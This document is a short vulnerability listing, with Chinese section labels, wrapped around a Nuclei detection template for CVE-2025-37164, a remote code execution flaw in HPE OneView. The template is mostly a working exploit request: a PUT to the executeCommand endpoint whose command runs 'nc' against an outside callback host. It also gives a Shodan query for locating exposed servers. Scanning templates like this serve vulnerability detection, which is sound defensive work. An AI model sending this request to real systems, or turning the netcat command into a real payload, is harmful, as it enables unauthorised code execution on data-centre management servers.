漏洞描述
HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code, exploit requires unspecified conditions.
CVE-2025-37164: HPE OneView - Remote Code Execution
PoC代码[已公开]
id: CVE-2025-37164
info:
name: HPE OneView - Remote Code Execution
author: DhiyaneshDk
severity: critical
description: |
HPE OneView contains a remote code execution vulnerability, letting remote attackers execute arbitrary code, exploit requires unspecified conditions.
impact: |
Remote attackers can execute arbitrary code, potentially leading to full system compromise.
remediation: |
Update to the latest version.
reference:
- https://attackerkb.com/topics/ixWdbDvjwX/cve-2025-37164/rapid7-analysis
metadata:
verified: true
max-request: 1
shodan-query: html:"HPE" html:"OneView"
tags: cve,cve2025,hpe,oneview,rce,vkev
http:
- raw:
- |
PUT /rest/id-pools/executeCommand HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
X-API-Version: 3800
Accept-Encoding: gzip
{
"cmd":"nc {{interactsh-url}} 80",
"result":0
}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "ExecutableCommand"
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 200
# digest: 4a0a0047304502207fcf03ee5d789974eb1333f34fcff392cfe6df1dff106216e1dd80b1aa50d28e022100b8a153a844e07810ab28e78659bd80756255bbd4ba867e212ce6590f8d3ad160:922c64590222798bb761d5b6d8e72950